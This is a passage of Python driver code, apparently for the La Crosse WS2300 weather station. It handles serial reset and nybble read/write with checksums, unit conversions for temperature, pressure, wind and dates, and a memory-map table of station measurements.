self.log_enter("re")
try:
for _ in range(self.__class__.MAX_RESETS):
self.clear_device()
self.write_byte('\x06')
#
# Occasionally 0, then 2 is returned. If 0 comes back,
# continue reading as this is more efficient than sending
                # an out-of-sync reset and letting the data reads restore
# synchronization. Occasionally, multiple 2's are returned.
# Read with a fast timeout until all data is exhausted, if
# we got a 2 back at all, we consider it a success.
#
success = False
answer = self.read_byte()
while answer != None:
if answer == '\x02':
success = True
answer = self.read_byte(0.05)
if success:
return
msg = "Reset failed, %d retries, no response" % self.__class__.MAX_RESETS
raise self.Ws2300Exception(msg)
finally:
self.log_exit()
#
# Encode the address.
#
def write_address(self,address):
for digit in range(4):
byte = chr((address >> (4 * (3-digit)) & 0xF) * 4 + 0x82)
self.write_byte(byte)
ack = chr(digit * 16 + (ord(byte) - 0x82) // 4)
answer = self.read_byte()
if ack != answer:
self.log("??")
return False
return True
#
# Write data, checking the reply.
#
def write_data(self,nybble_address,nybbles,encode_constant=None):
self.log_enter("wd")
try:
if not self.write_address(nybble_address):
return None
if encode_constant == None:
encode_constant = self.WRITENIB
encoded_data = ''.join([
chr(nybbles[i]*4 + encode_constant)
for i in range(len(nybbles))])
ack_constant = {
self.SETBIT: self.SETACK,
self.UNSETBIT: self.UNSETACK,
self.WRITENIB: self.WRITEACK
}[encode_constant]
self.log(",")
for i in range(len(encoded_data)):
self.write_byte(encoded_data[i])
answer = self.read_byte()
if chr(nybbles[i] + ack_constant) != answer:
self.log("??")
return None
return True
finally:
self.log_exit()
#
    # Reset the device and write a command, verifying it was written correctly.
#
def write_safe(self,nybble_address,nybbles,encode_constant=None):
self.log_enter("ws")
try:
for _ in range(self.MAXRETRIES):
self.reset_06()
command_data = self.write_data(nybble_address,nybbles,encode_constant)
if command_data != None:
return command_data
raise self.Ws2300Exception("write_safe failed, retries exceeded")
finally:
self.log_exit()
#
    # A total kludge, but it's the easiest way to force the 'computer
# time' to look like a normal ws2300 variable, which it most definitely
# isn't, of course.
#
def read_computer_time(self,nybble_address,nybble_count):
now = time.time()
tm = time.localtime(now)
tu = time.gmtime(now)
year2 = tm[0] % 100
datetime_data = (
tu[5]%10, tu[5]//10, tu[4]%10, tu[4]//10, tu[3]%10, tu[3]//10,
tm[5]%10, tm[5]//10, tm[4]%10, tm[4]//10, tm[3]%10, tm[3]//10,
tm[2]%10, tm[2]//10, tm[1]%10, tm[1]//10, year2%10, year2//10)
address = nybble_address+18
return datetime_data[address:address+nybble_count]
#
# Read 'length' nybbles at address. Returns: (nybble_at_address, ...).
# Can't read more than MAXBLOCK nybbles at a time.
#
def read_data(self,nybble_address,nybble_count):
if nybble_address < 0:
return self.read_computer_time(nybble_address,nybble_count)
self.log_enter("rd")
try:
if nybble_count < 1 or nybble_count > self.MAXBLOCK:
StandardError("Too many nybbles requested")
bytes_ = (nybble_count + 1) // 2
if not self.write_address(nybble_address):
return None
#
# Write the number bytes we want to read.
#
encoded_data = chr(0xC2 + bytes_*4)
self.write_byte(encoded_data)
answer = self.read_byte()
check = chr(0x30 + bytes_)
if answer != check:
self.log("??")
return None
#
# Read the response.
#
self.log(", :")
response = ""
for _ in range(bytes_):
answer = self.read_byte()
if answer == None:
return None
response += answer
#
# Read and verify checksum
#
answer = self.read_byte()
checksum = sum([ord(b) for b in response]) % 256
if chr(checksum) != answer:
self.log("??")
return None
flatten = lambda a,b: a + (ord(b) % 16, ord(b) / 16)
return reduce(flatten, response, ())[:nybble_count]
finally:
self.log_exit()
#
# Read a batch of blocks. Batches is a list of data to be read:
# [(address_of_first_nybble, length_in_nybbles), ...]
# returns:
# [(nybble_at_address, ...), ...]
#
def read_batch(self,batches):
self.log_enter("rb start")
self.log_exit()
try:
if [b for b in batches if b[0] >= 0]:
self.reset_06()
result = []
for batch in batches:
address = batch[0]
data = ()
for start_pos in range(0,batch[1],self.MAXBLOCK):
for _ in range(self.MAXRETRIES):
bytes_ = min(self.MAXBLOCK, batch[1]-start_pos)
response = self.read_data(address + start_pos, bytes_)
if response != None:
break
self.reset_06()
if response == None:
raise self.Ws2300Exception("read failed, retries exceeded")
data += response
result.append(data)
return result
finally:
self.log_enter("rb end")
self.log_exit()
#
# Reset the device, read a block of nybbles at the passed address.
#
def read_safe(self,nybble_address,nybble_count):
self.log_enter("rs")
try:
return self.read_batch([(nybble_address,nybble_count)])[0]
finally:
self.log_exit()
#
# Debug logging of serial IO.
#
def log(self, s):
if not DEBUG_SERIAL:
return
self.log_buffer[-1] = self.log_buffer[-1] + s
def log_enter(self, action):
if not DEBUG_SERIAL:
return
self.log_nest += 1
if self.log_nest == 1:
if len(self.log_buffer) > 1000:
del self.log_buffer[0]
self.log_buffer.append("%5.2f %s " % (time.time() % 100, action))
self.log_mode = 'e'
def log_exit(self):
if not DEBUG_SERIAL:
return
self.log_nest -= 1
#
# Print a data block.
#
def bcd2num(nybbles):
digits = list(nybbles)[:]
digits.reverse()
return reduce(lambda a,b: a*10 + b, digits, 0)
def num2bcd(number, nybble_count):
result = []
for _ in range(nybble_count):
result.append(int(number % 10))
number //= 10
return tuple(result)
def bin2num(nybbles):
digits = list(nybbles)
digits.reverse()
return reduce(lambda a,b: a*16 + b, digits, 0)
def num2bin(number, nybble_count):
result = []
number = int(number)
for _ in range(nybble_count):
result.append(number % 16)
number //= 16
return tuple(result)
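#
# Sanity examples for the nybble codecs above (values for illustration only).
# Both encodings store the least significant nybble first:
#   bcd2num((3, 2, 1)) == 123      num2bcd(123, 3) == (3, 2, 1)
#   bin2num((10, 1)) == 26 (0x1a)  num2bin(26, 2) == (10, 1)
#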
#
# A "Conversion" encapsulates a unit of measurement on the Ws2300. Eg
# temperature, or wind speed.
#
class Conversion(object):
description = None # Description of the units.
nybble_count = None # Number of nybbles used on the WS2300
units = None # Units name (eg hPa).
#
# Initialise ourselves.
# units - text description of the units.
# nybble_count- Size of stored value on ws2300 in nybbles
# description - Description of the units
#
def __init__(self, units, nybble_count, description):
self.description = description
self.nybble_count = nybble_count
self.units = units
#
# Convert the nybbles read from the ws2300 to our internal value.
#
def binary2value(self, data): raise NotImplementedError()
#
# Convert our internal value to nybbles that can be written to the ws2300.
#
def value2binary(self, value): raise NotImplementedError()
#
# Print value.
#
def str(self, value): raise NotImplementedError()
#
# Convert the string produced by "str()" back to the value.
#
def parse(self, s): raise NotImplementedError()
#
# Transform data into something that can be written. Returns:
# (new_bytes, ws2300.write_safe_args, ...)
# This only becomes tricky when less than a nybble is written.
#
def write(self, data, nybble):
return (data, data)
#
    # Test if the nybbles read from the Ws2300 are sensible. Sometimes a
# communications error will make it past the weak checksums the Ws2300
# uses. This optional function implements another layer of checking -
# does the value returned make sense. Returns True if the value looks
# like garbage.
#
def garbage(self, data):
return False
#
# For values stores as binary numbers.
#
class BinConversion(Conversion):
mult = None
scale = None
units = None
def __init__(self, units, nybble_count, scale, description, mult=1, check=None):
Conversion.__init__(self, units, nybble_count, description)
self.mult = mult
self.scale = scale
self.units = units
def binary2value(self, data):
return (bin2num(data) * self.mult) / 10.0**self.scale
def value2binary(self, value):
return num2bin(int(value * 10**self.scale) // self.mult, self.nybble_count)
def str(self, value):
return "%.*f" % (self.scale, value)
def parse(self, s):
return float(s)
#
# For values stored as BCD numbers.
#
class BcdConversion(Conversion):
offset = None
scale = None
units = None
def __init__(self, units, nybble_count, scale, description, offset=0):
Conversion.__init__(self, units, nybble_count, description)
self.offset = offset
self.scale = scale
self.units = units
def binary2value(self, data):
num = bcd2num(data) % 10**self.nybble_count + self.offset
return float(num) / 10**self.scale
def value2binary(self, value):
return num2bcd(int(value * 10**self.scale) - self.offset, self.nybble_count)
def str(self, value):
return "%.*f" % (self.scale, value)
def parse(self, s):
return float(s)
#
# For pressures. Add a garbage check.
#
class PressureConversion(BcdConversion):
def __init__(self):
BcdConversion.__init__(self, "hPa", 5, 1, "pressure")
def garbage(self, data):
value = self.binary2value(data)
return value < 900 or value > 1200
#
# For values the represent a date.
#
class ConversionDate(Conversion):
format = None
def __init__(self, nybble_count, format_):
description = format_
for xlate in "%Y:yyyy,%m:mm,%d:dd,%H:hh,%M:mm,%S:ss".split(","):
description = description.replace(*xlate.split(":"))
Conversion.__init__(self, "", nybble_count, description)
self.format = format_
def str(self, value):
return time.strftime(self.format, time.localtime(value))
def parse(self, s):
return time.mktime(time.strptime(s, self.format))
class DateConversion(ConversionDate):
def __init__(self):
ConversionDate.__init__(self, 6, "%Y-%m-%d")
def binary2value(self, data):
x = bcd2num(data)
return time.mktime((
x // 10000 % 100,
x // 100 % 100,
x % 100,
0,
0,
0,
0,
0,
0))
def value2binary(self, value):
tm = time.localtime(value)
dt = tm[2] + tm[1] * 100 + (tm[0]-2000) * 10000
return num2bcd(dt, self.nybble_count)
class DatetimeConversion(ConversionDate):
def __init__(self):
ConversionDate.__init__(self, 11, "%Y-%m-%d %H:%M")
def binary2value(self, data):
x = bcd2num(data)
return time.mktime((
x // 1000000000 % 100 + 2000,
x // 10000000 % 100,
x // 100000 % 100,
x // 100 % 100,
x % 100,
0,
0,
0,
0))
def value2binary(self, value):
tm = time.localtime(value)
dow = tm[6] + 1
dt = tm[4]+(tm[3]+(dow+(tm[2]+(tm[1]+(tm[0]-2000)*100)*100)*10)*100)*100
return num2bcd(dt, self.nybble_count)
class UnixtimeConversion(ConversionDate):
def __init__(self):
ConversionDate.__init__(self, 12, "%Y-%m-%d %H:%M:%S")
def binary2value(self, data):
x = bcd2num(data)
return time.mktime((
x //10000000000 % 100 + 2000,
x // 100000000 % 100,
x // 1000000 % 100,
x // 10000 % 100,
x // 100 % 100,
x % 100,
0,
0,
0))
def value2binary(self, value):
tm = time.localtime(value)
dt = tm[5]+(tm[4]+(tm[3]+(tm[2]+(tm[1]+(tm[0]-2000)*100)*100)*100)*100)*100
return num2bcd(dt, self.nybble_count)
class TimestampConversion(ConversionDate):
def __init__(self):
ConversionDate.__init__(self, 10, "%Y-%m-%d %H:%M")
def binary2value(self, data):
x = bcd2num(data)
return time.mktime((
x // 100000000 % 100 + 2000,
x // 1000000 % 100,
x // 10000 % 100,
x // 100 % 100,
x % 100,
0,
0,
0,
0))
def value2binary(self, value):
tm = time.localtime(value)
dt = tm[4] + (tm[3] + (tm[2] + (tm[1] + (tm[0]-2000)*100)*100)*100)*100
return num2bcd(dt, self.nybble_count)
class TimeConversion(ConversionDate):
def __init__(self):
ConversionDate.__init__(self, 6, "%H:%M:%S")
def binary2value(self, data):
x = bcd2num(data)
return time.mktime((
0,
0,
0,
x // 10000 % 100,
x // 100 % 100,
x % 100,
0,
0,
0)) - time.timezone
def value2binary(self, value):
tm = time.localtime(value)
dt = tm[5] + tm[4]*100 + tm[3]*10000
return num2bcd(dt, self.nybble_count)
def parse(self, s):
return time.mktime((0,0,0) + time.strptime(s, self.format)[3:]) + time.timezone
class WindDirectionConversion(Conversion):
def __init__(self):
Conversion.__init__(self, "deg", 1, "North=0 clockwise")
def binary2value(self, data):
return data[0] * 22.5
def value2binary(self, value):
return (int((value + 11.25) / 22.5),)
def str(self, value):
return "%g" % value
def parse(self, s):
return float(s)
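# For example, the raw nybble 4 decodes to 4 * 22.5 = 90.0 degrees, and
# value2binary(90.0) rounds back to (4,); directions are quantized to
# sixteen 22.5-degree sectors.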
class WindVelocityConversion(Conversion):
def __init__(self):
Conversion.__init__(self, "ms,d", 4, "wind speed and direction")
def binary2value(self, data):
return (bin2num(data[:3])/10.0, bin2num(data[3:4]) * 22.5)
def value2binary(self, value):
        return num2bin(value[0]*10, 3) + num2bin((value[1] + 11.25) / 22.5, 1)
def str(self, value):
return "%.1f,%g" % value
def parse(self, s):
return tuple([float(x) for x in s.split(",")])
# The ws2300 1.8 implementation does not calculate wind speed correctly -
# it uses bcd2num instead of bin2num. This conversion object uses bin2num
# decoding and it reads all wind data in a single transaction so that we do
# not suffer coherency problems.
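# For example, raw speed nybbles (2, 4, 0) decode as bin2num -> 0x042 = 66,
# i.e. 6.6 m/s, whereas the buggy bcd2num decoding would yield 42 -> 4.2 m/s.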
class WindConversion(Conversion):
def __init__(self):
Conversion.__init__(self, "ms,d,o,v", 12, "wind speed, dir, validity")
def binary2value(self, data):
overflow = data[0]
validity = data[1]
speed = bin2num(data[2:5]) / 10.0
direction = data[5] * 22.5
return (speed, direction, overflow, validity)
def str(self, value):
return "%.1f,%g,%s,%s" % value
def parse(self, s):
return tuple([float(x) for x in s.split(",")])
#
# For non-numerical values.
#
class TextConversion(Conversion):
constants = None
def __init__(self, constants):
items = constants.items()[:]
items.sort()
fullname = ",".join([c[1]+"="+str(c[0]) for c in items]) + ",unknown-X"
Conversion.__init__(self, "", 1, fullname)
self.constants = constants
def binary2value(self, data):
return data[0]
def value2binary(self, value):
return (value,)
def str(self, value):
result = self.constants.get(value, None)
if result != None:
return result
return "unknown-%d" % value
def parse(self, s):
result = [c[0] for c in self.constants.items() if c[1] == s]
if result:
return result[0]
return None
#
# For values that are represented by one bit.
#
class ConversionBit(Conversion):
bit = None
desc = None
def __init__(self, bit, desc):
self.bit = bit
self.desc = desc
Conversion.__init__(self, "", 1, desc[0] + "=0," + desc[1] + "=1")
def binary2value(self, data):
return data[0] & (1 << self.bit) and 1 or 0
def value2binary(self, value):
return (value << self.bit,)
def str(self, value):
return self.desc[value]
def parse(self, s):
return [c[0] for c in self.desc.items() if c[1] == s][0]
class BitConversion(ConversionBit):
def __init__(self, bit, desc):
ConversionBit.__init__(self, bit, desc)
#
# Since Ws2300.write_safe() only writes nybbles and we have just one bit,
# we have to insert that bit into the data_read so it can be written as
# a nybble.
#
def write(self, data, nybble):
data = (nybble & ~(1 << self.bit) | data[0],)
return (data, data)
class AlarmSetConversion(BitConversion):
bit = None
desc = None
def __init__(self, bit):
BitConversion.__init__(self, bit, {0:"off", 1:"on"})
class AlarmActiveConversion(BitConversion):
bit = None
desc = None
def __init__(self, bit):
BitConversion.__init__(self, bit, {0:"inactive", 1:"active"})
#
# For values that are represented by one bit, and must be written as
# a single bit.
#
class SetresetConversion(ConversionBit):
bit = None
def __init__(self, bit, desc):
ConversionBit.__init__(self, bit, desc)
#
# Setreset bits use a special write mode.
#
def write(self, data, nybble):
if data[0] == 0:
operation = Ws2300.UNSETBIT
else:
operation = Ws2300.SETBIT
return ((nybble & ~(1 << self.bit) | data[0],), [self.bit], operation)
#
# Conversion for history. This kludge makes history fit into the framework
# used for all the other measures.
#
class HistoryConversion(Conversion):
class HistoryRecord(object):
temp_indoor = None
temp_outdoor = None
pressure_absolute = None
humidity_indoor = None
humidity_outdoor = None
rain = None
wind_speed = None
wind_direction = None
def __str__(self):
return "%4.1fc %2d%% %4.1fc %2d%% %6.1fhPa %6.1fmm %2dm/s %5g" % (
self.temp_indoor, self.humidity_indoor,
self.temp_outdoor, self.humidity_outdoor,
self.pressure_absolute, self.rain,
self.wind_speed, self.wind_direction)
def parse(cls, s):
rec = cls()
toks = [tok.rstrip(string.ascii_letters + "%/") for tok in s.split()]
rec.temp_indoor = float(toks[0])
rec.humidity_indoor = int(toks[1])
rec.temp_outdoor = float(toks[2])
rec.humidity_outdoor = int(toks[3])
rec.pressure_absolute = float(toks[4])
rec.rain = float(toks[5])
rec.wind_speed = int(toks[6])
rec.wind_direction = int((float(toks[7]) + 11.25) / 22.5) % 16
return rec
parse = classmethod(parse)
def __init__(self):
Conversion.__init__(self, "", 19, "history")
def binary2value(self, data):
value = self.__class__.HistoryRecord()
n = bin2num(data[0:5])
value.temp_indoor = (n % 1000) / 10.0 - 30
value.temp_outdoor = (n - (n % 1000)) / 10000.0 - 30
n = bin2num(data[5:10])
value.pressure_absolute = (n % 10000) / 10.0
if value.pressure_absolute < 500:
value.pressure_absolute += 1000
value.humidity_indoor = (n - (n % 10000)) / 10000.0
value.humidity_outdoor = bcd2num(data[10:12])
value.rain = bin2num(data[12:15]) * 0.518
value.wind_speed = bin2num(data[15:18])
value.wind_direction = bin2num(data[18:19]) * 22.5
return value
def value2binary(self, value):
result = ()
n = int((value.temp_indoor + 30) * 10.0 + (value.temp_outdoor + 30) * 10000.0 + 0.5)
result = result + num2bin(n, 5)
n = value.pressure_absolute % 1000
n = int(n * 10.0 + value.humidity_indoor * 10000.0 + 0.5)
result = result + num2bin(n, 5)
result = result + num2bcd(value.humidity_outdoor, 2)
result = result + num2bin(int((value.rain + 0.518/2) / 0.518), 3)
result = result + num2bin(value.wind_speed, 3)
result = result + num2bin(value.wind_direction, 1)
return result
#
# Print value.
#
def str(self, value):
return str(value)
#
# Convert the string produced by "str()" back to the value.
#
def parse(self, s):
return self.__class__.HistoryRecord.parse(s)
#
# Various conversions we know about.
#
conv_ala0 = AlarmActiveConversion(0)
conv_ala1 = AlarmActiveConversion(1)
conv_ala2 = AlarmActiveConversion(2)
conv_ala3 = AlarmActiveConversion(3)
conv_als0 = AlarmSetConversion(0)
conv_als1 = AlarmSetConversion(1)
conv_als2 = AlarmSetConversion(2)
conv_als3 = AlarmSetConversion(3)
conv_buzz = SetresetConversion(3, {0:'on', 1:'off'})
conv_lbck = SetresetConversion(0, {0:'off', 1:'on'})
conv_date = DateConversion()
conv_dtme = DatetimeConversion()
conv_utme = UnixtimeConversion()
conv_hist = HistoryConversion()
conv_stmp = TimestampConversion()
conv_time = TimeConversion()
conv_wdir = WindDirectionConversion()
conv_wvel = WindVelocityConversion()
conv_conn = TextConversion({0:"cable", 3:"lost", 15:"wireless"})
conv_fore = TextConversion({0:"rainy", 1:"cloudy", 2:"sunny"})
conv_spdu = TextConversion({0:"m/s", 1:"knots", 2:"beaufort", 3:"km/h", 4:"mph"})
conv_tend = TextConversion({0:"steady", 1:"rising", 2:"falling"})
conv_wovr = TextConversion({0:"no", 1:"overflow"})
conv_wvld = TextConversion({0:"ok", 1:"invalid", 2:"overflow"})
conv_lcon = BinConversion("", 1, 0, "contrast")
conv_rec2 = BinConversion("", 2, 0, "record number")
conv_humi = BcdConversion("%", 2, 0, "humidity")
conv_pres = PressureConversion()
conv_rain = BcdConversion("mm", 6, 2, "rain")
conv_temp = BcdConversion("C", 4, 2, "temperature", -3000)
conv_per2 = BinConversion("s", 2, 1, "time interval", 5)
conv_per3 = BinConversion("min", 3, 0, "time interval")
conv_wspd = BinConversion("m/s", 3, 1, "speed")
conv_wind = WindConversion()
#
# Define a measurement on the Ws2300. This encapsulates:
# - The names (abbrev and long) of the thing being measured, eg wind speed.
# - The location it can be found at in the Ws2300's memory map.
# - The Conversion used to represent the figure.
#
class Measure(object):
IDS = {} # map, Measures defined. {id: Measure, ...}
NAMES = {} # map, Measures defined. {name: Measure, ...}
address = None # int, Nybble address in the Ws2300
conv = None # object, Type of value
id = None # string, Short name
name = None # string, Long name
reset = None # string, Id of measure used to reset this one
def __init__(self, address, id_, conv, name, reset=None):
self.address = address
self.conv = conv
self.reset = reset
        if id_ is not None:
            self.id = id_
            assert id_ not in self.__class__.IDS
            self.__class__.IDS[id_] = self
        if name is not None:
            self.name = name
            assert name not in self.__class__.NAMES
self.__class__.NAMES[name] = self
def __hash__(self):
return hash(self.id)
def __cmp__(self, other):
if isinstance(other, Measure):
return cmp(self.id, other.id)
return cmp(type(self), type(other))
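#
# Illustrative sketch (not part of the original driver): every Measure
# registers itself in the IDS and NAMES maps, so a lookup by short id and by
# long name yields the same instance once the definitions further down have
# run.
#
def _measure_lookup_example():
    m = Measure.IDS["ot"]                    # outside temperature at 0x373
    assert Measure.NAMES["out temp"] is m    # same registry entry
    return hex(m.address), m.conv.nybble_count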
#
# Conversion for raw Hex data. These are created as needed.
#
class HexConversion(Conversion):
def __init__(self, nybble_count):
Conversion.__init__(self, "", nybble_count, "hex data")
def binary2value(self, data):
return data
def value2binary(self, value):
return value
def str(self, value):
return ",".join(["%x" % nybble for nybble in value])
def parse(self, s):
toks = s.replace(","," ").split()
for i in range(len(toks)):
s = list(toks[i])
s.reverse()
toks[i] = ''.join(s)
list_str = list(''.join(toks))
self.nybble_count = len(list_str)
        return tuple([int(nybble, 16) for nybble in list_str])
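#
# Illustrative sketch (not part of the original driver): round-tripping raw
# nybbles through HexConversion. str() emits one hex digit per nybble and
# parse() reads the comma-separated digits back as base-16 values.
#
def _hex_conversion_example():
    conv = HexConversion(3)
    text = conv.str((0x1, 0xa, 0xf))    # -> "1,a,f"
    return conv.parse(text)             # -> (1, 10, 15)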
#
# The raw nybble measure.
#
class HexMeasure(Measure):
def __init__(self, address, id_, conv, name):
self.address = address
self.name = name
self.conv = conv
#
# A History record. Again a kludge to make history fit into the framework
# developed for the other measurements. History records are identified
# by their record number. Record number 0 is the most recently written
# record, record number 1 is the next most recently written and so on.
#
class HistoryMeasure(Measure):
HISTORY_BUFFER_ADDR = 0x6c6 # int, Address of the first history record
    MAX_HISTORY_RECORDS = 0xaf # int, Max number of history records stored
LAST_POINTER = None # int, Pointer to last record
RECORD_COUNT = None # int, Number of records in use
recno = None # int, The record number this represents
conv = conv_hist
def __init__(self, recno):
self.recno = recno
def set_constants(cls, ws2300):
measures = [Measure.IDS["hp"], Measure.IDS["hn"]]
data = read_measurements(ws2300, measures)
cls.LAST_POINTER = int(measures[0].conv.binary2value(data[0]))
cls.RECORD_COUNT = int(measures[1].conv.binary2value(data[1]))
set_constants = classmethod(set_constants)
def id(self):
return "h%03d" % self.recno
id = property(id)
def name(self):
return "history record %d" % self.recno
name = property(name)
def offset(self):
if self.LAST_POINTER is None:
raise StandardError("HistoryMeasure.set_constants hasn't been called")
return (self.LAST_POINTER - self.recno) % self.MAX_HISTORY_RECORDS
offset = property(offset)
def address(self):
return self.HISTORY_BUFFER_ADDR + self.conv.nybble_count * self.offset
address = property(address)
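#
# Illustrative sketch (not part of the original driver): how a record number
# maps to a nybble address once set_constants() has primed the class. The
# pointer value below is made up; the real code reads it from the station.
#
def _history_address_example():
    HistoryMeasure.LAST_POINTER = 0x10    # pretend "hp" read back 16
    HistoryMeasure.RECORD_COUNT = 0xaf
    recent = HistoryMeasure(3)            # fourth most recent record
    # offset wraps modulo MAX_HISTORY_RECORDS; each record is 19 nybbles
    return recent.offset, hex(recent.address)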
#
# The measurements we know about. This is all of them documented in
# memory_map_2300.txt, bar the history. History is handled specially.
# And of course, the "c?"'s aren't real measures at all - it's the current
# time on this machine.
#
Measure( -18, "ct", conv_time, "this computer's time")
Measure( -12, "cw", conv_utme, "this computer's date time")
Measure( -6, "cd", conv_date, "this computer's date")
Measure(0x006, "bz", conv_buzz, "buzzer")
Measure(0x00f, "wsu", conv_spdu, "wind speed units")
Measure(0x016, "lb", conv_lbck, "lcd backlight")
Measure(0x019, "sss", conv_als2, "storm warn alarm set")
Measure(0x019, "sts", conv_als0, "station time alarm set")
Measure(0x01a, "phs", conv_als3, "pressure max alarm set")
Measure(0x01a, "pls", conv_als2, "pressure min alarm set")
Measure(0x01b, "oths", conv_als3, "out temp max alarm set")
Measure(0x01b, "otls", conv_als2, "out temp min alarm set")
Measure(0x01b, "iths", conv_als1, "in temp max alarm set")
Measure(0x01b, "itls", conv_als0, "in temp min alarm set")
Measure(0x01c, "dphs", conv_als3, "dew point max alarm set")
Measure(0x01c, "dpls", conv_als2, "dew point min alarm set")
Measure(0x01c, "wchs", conv_als1, "wind chill max alarm set")
Measure(0x01c, "wcls", conv_als0, "wind chill min alarm set")
Measure(0x01d, "ihhs", conv_als3, "in humidity max alarm set")
Measure(0x01d, "ihls", conv_als2, "in humidity min alarm set")
Measure(0x01d, "ohhs", conv_als1, "out humidity max alarm set")
Measure(0x01d, "ohls", conv_als0, "out humidity min alarm set")
Measure(0x01e, "rhhs", conv_als1, "rain 1h alarm set")
Measure(0x01e, "rdhs", conv_als0, "rain 24h alarm set")
Measure(0x01f, "wds", conv_als2, "wind direction alarm set")
Measure(0x01f, "wshs", conv_als1, "wind speed max alarm set")
Measure(0x01f, "wsls", conv_als0, "wind speed min alarm set")
Measure(0x020, "siv", conv_ala2, "icon alarm active")
Measure(0x020, "stv", conv_ala0, "station time alarm active")
Measure(0x021, "phv", conv_ala3, "pressure max alarm active")
Measure(0x021, "plv", conv_ala2, "pressure min alarm active")
Measure(0x022, "othv", conv_ala3, "out temp max alarm active")
Measure(0x022, "otlv", conv_ala2, "out temp min alarm active")
Measure(0x022, "ithv", conv_ala1, "in temp max alarm active")
Measure(0x022, "itlv", conv_ala0, "in temp min alarm active")
Measure(0x023, "dphv", conv_ala3, "dew point max alarm active")
Measure(0x023, "dplv", conv_ala2, "dew point min alarm active")
Measure(0x023, "wchv", conv_ala1, "wind chill max alarm active")
Measure(0x023, "wclv", conv_ala0, "wind chill min alarm active")
Measure(0x024, "ihhv", conv_ala3, "in humidity max alarm active")
Measure(0x024, "ihlv", conv_ala2, "in humidity min alarm active")
Measure(0x024, "ohhv", conv_ala1, "out humidity max alarm active")
Measure(0x024, "ohlv", conv_ala0, "out humidity min alarm active")
Measure(0x025, "rhhv", conv_ala1, "rain 1h alarm active")
Measure(0x025, "rdhv", conv_ala0, "rain 24h alarm active")
Measure(0x026, "wdv", conv_ala2, "wind direction alarm active")
Measure(0x026, "wshv", conv_ala1, "wind speed max alarm active")
Measure(0x026, "wslv", conv_ala0, "wind speed min alarm active")
Measure(0x027, None, conv_ala3, "pressure max alarm active alias")
Measure(0x027, None, conv_ala2, "pressure min alarm active alias")
Measure(0x028, None, conv_ala3, "out temp max alarm active alias")
Measure(0x028, None, conv_ala2, "out temp min alarm active alias")
Measure(0x028, None, conv_ala1, "in temp max alarm active alias")
Measure(0x028, None, conv_ala0, "in temp min alarm active alias")
Measure(0x029, None, conv_ala3, "dew point max alarm active alias")
Measure(0x029, None, conv_ala2, "dew point min alarm active alias")
Measure(0x029, None, conv_ala1, "wind chill max alarm active alias")
Measure(0x029, None, conv_ala0, "wind chill min alarm active alias")
Measure(0x02a, None, conv_ala3, "in humidity max alarm active alias")
Measure(0x02a, None, conv_ala2, "in humidity min alarm active alias")
Measure(0x02a, None, conv_ala1, "out humidity max alarm active alias")
Measure(0x02a, None, conv_ala0, "out humidity min alarm active alias")
Measure(0x02b, None, conv_ala1, "rain 1h alarm active alias")
Measure(0x02b, None, conv_ala0, "rain 24h alarm active alias")
Measure(0x02c, None, conv_ala2, "wind direction alarm active alias")
Measure(0x02c, None, conv_ala1, "wind speed max alarm active alias")
Measure(0x02c, None, conv_ala0, "wind speed min alarm active alias")
Measure(0x200, "st", conv_time, "station set time", reset="ct")
Measure(0x23b, "sw", conv_dtme, "station current date time")
Measure(0x24d, "sd", conv_date, "station set date", reset="cd")
Measure(0x266, "lc", conv_lcon, "lcd contrast (ro)")
Measure(0x26b, "for", conv_fore, "forecast")
Measure(0x26c, "ten", conv_tend, "tendency")
Measure(0x346, "it", conv_temp, "in temp")
Measure(0x34b, "itl", conv_temp, "in temp min", reset="it")
Measure(0x350, "ith", conv_temp, "in temp max", reset="it")
Measure(0x354, "itlw", conv_stmp, "in temp min when", reset="sw")
Measure(0x35e, "ithw", conv_stmp, "in temp max when", reset="sw")
Measure(0x369, "itla", conv_temp, "in temp min alarm")
Measure(0x36e, "itha", conv_temp, "in temp max alarm")
Measure(0x373, "ot", conv_temp, "out temp")
Measure(0x378, "otl", conv_temp, "out temp min", reset="ot")
Measure(0x37d, "oth", conv_temp, "out temp max", reset="ot")
Measure(0x381, "otlw", conv_stmp, "out temp min when", reset="sw")
Measure(0x38b, "othw", conv_stmp, "out temp max when", reset="sw")
Measure(0x396, "otla", conv_temp, "out temp min alarm")
Measure(0x39b, "otha", conv_temp, "out temp max alarm")
Measure(0x3a0, "wc", conv_temp, "wind chill")
Measure(0x3a5, "wcl", conv_temp, "wind chill min", reset="wc")
Measure(0x3aa, "wch", conv_temp, "wind chill max", reset="wc")
Measure(0x3ae, "wclw", conv_stmp, "wind chill min when", reset="sw")
Measure(0x3b8, "wchw", conv_stmp, "wind chill max when", reset="sw")
Measure(0x3c3, "wcla", conv_temp, "wind chill min alarm")
Measure(0x3c8, "wcha", conv_temp, "wind chill max alarm")
Measure(0x3ce, "dp", conv_temp, "dew point")
Measure(0x3d3, "dpl", conv_temp, "dew point min", reset="dp")
Measure(0x3d8, "dph", conv_temp, "dew point max", reset="dp")
Measure(0x3dc, "dplw", conv_stmp, "dew point min when", reset="sw")
Measure(0x3e6, "dphw", conv_stmp, "dew point max when", reset="sw")
Measure(0x3f1, "dpla", conv_temp, "dew point min alarm")
Measure(0x3f6, "dpha", conv_temp, "dew point max alarm")
Measure(0x3fb, "ih", conv_humi, "in humidity")
Measure(0x3fd, "ihl", conv_humi, "in humidity min", reset="ih")
Measure(0x3ff, "ihh", conv_humi, "in humidity max", reset="ih")
Measure(0x401, "ihlw", conv_stmp, "in humidity min when", reset="sw")
Measure(0x40b, "ihhw", conv_stmp, "in humidity max when", reset="sw")
Measure(0x415, "ihla", conv_humi, "in humidity min alarm")
Measure(0x417, "ihha", conv_humi, "in humidity max alarm")
Measure(0x419, "oh", conv_humi, "out humidity")
Measure(0x41b, "ohl", conv_humi, "out humidity min", reset="oh")
Measure(0x41d, "ohh", conv_humi, "out humidity max", reset="oh")
Measure(0x41f, "ohlw", conv_stmp, "out humidity min when", reset="sw")
Measure(0x429, "ohhw", conv_stmp, "out humidity max when", reset="sw")
Measure(0x433, "ohla", conv_humi, "out humidity min alarm")
Measure(0x435, "ohha", conv_humi, "out humidity max alarm")
Measure(0x497, "rd", conv_rain, "rain 24h")
Measure(0x49d, "rdh", conv_rain, "rain 24h max", reset="rd")
Measure(0x4a3, "rdhw", conv_stmp, "rain 24h max when", reset="sw")
Measure(0x4ae, "rdha", conv_rain, "rain 24h max alarm")
Measure(0x4b4, "rh", conv_rain, "rain 1h")
Measure(0x4ba, "rhh", conv_rain, "rain 1h max", reset="rh")
Measure(0x4c0, "rhhw", conv_stmp, "rain 1h max when", reset="sw")
Measure(0x4cb, "rhha", conv_rain, "rain 1h max alarm")
